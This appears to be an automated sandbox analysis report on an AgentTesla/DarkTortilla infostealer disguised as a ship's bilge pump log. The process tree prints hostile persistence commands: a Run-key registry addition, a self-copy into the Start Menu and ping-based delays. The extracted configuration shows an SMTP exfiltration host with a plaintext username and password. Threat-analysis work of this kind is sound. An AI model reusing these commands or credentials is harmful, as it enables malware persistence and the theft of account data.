Edit tour

Windows Analysis Report
SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Overview

General Information

Sample name:	SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe
Analysis ID:	1417526
MD5:	3ff8dae4fea5ddd0d045af07d3ce8016
SHA1:	e15f1b3c589dc0ec3c9de7f501a259b73ce62482
SHA256:	f1c0ff1f0bc852d09a15805af1bd83a32eabf5b5412a9b43053ecfb8cb03250b
Tags:	exeMassLogger
Infos:

Detection

AgentTesla, DarkTortilla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

.NET source code contains potential unpacker

.NET source code contains very large strings

Allocates memory in foreign processes

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" MD5: 3FF8DAE4FEA5DDD0D045AF07D3CE8016)

cmd.exe (PID: 7564 cmdline: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7624 cmdline: ping 127.0.0.1 -n 37 MD5: B3624DD758CCECF93A1226CEF252CA12)

reg.exe (PID: 8080 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 7984 cmdline: "cmd" /c ping 127.0.0.1 -n 39 > nul && copy "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" && ping 127.0.0.1 -n 39 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 8036 cmdline: ping 127.0.0.1 -n 39 MD5: B3624DD758CCECF93A1226CEF252CA12)

PING.EXE (PID: 2476 cmdline: ping 127.0.0.1 -n 39 MD5: B3624DD758CCECF93A1226CEF252CA12)

dll.exe (PID: 6048 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe" MD5: 3FF8DAE4FEA5DDD0D045AF07D3CE8016)

InstallUtil.exe (PID: 7932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

InstallUtil.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

newfile.exe (PID: 1744 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

newfile.exe (PID: 2364 cmdline: "C:\Users\user\AppData\Roaming\newfile\newfile.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.crediperu.pe", "Username": "informes@crediperu.pe", "Password": "Jfupuy02chung"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.3568807416.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2044932954.000000000388E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.4151678724.0000000003321000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2046079068.00000000050C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.3568807416.00000000040E0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.3568807416.000000000402C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000010.00000002.4151678724.000000000334E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2044074140.0000000002774000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.3558267048.000000000305B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.3558267048.0000000002F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2044074140.0000000002681000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe PID: 7336	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: dll.exe PID: 6048	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: dll.exe PID: 6048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dll.exe PID: 6048	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: dll.exe PID: 6048	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 7932	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7932	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 7608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7608	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.dll.exe.3ff1102.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32894:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32906:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32990:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32afe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.388edf0.4.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
15.2.InstallUtil.exe.7b0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.InstallUtil.exe.7b0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
15.2.InstallUtil.exe.7b0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
15.2.InstallUtil.exe.7b0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.50c0000.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.388edf0.4.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.50c0000.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32894:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32906:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32990:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32afe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32894:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32906:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32990:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32afe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32894:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32906:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32990:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32afe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32894:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32906:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32990:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32a22:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32a8c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32afe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32b94:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32c24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x70454:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x704c6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70550:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x705e2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7064c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x706be:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x70754:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x707e4:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
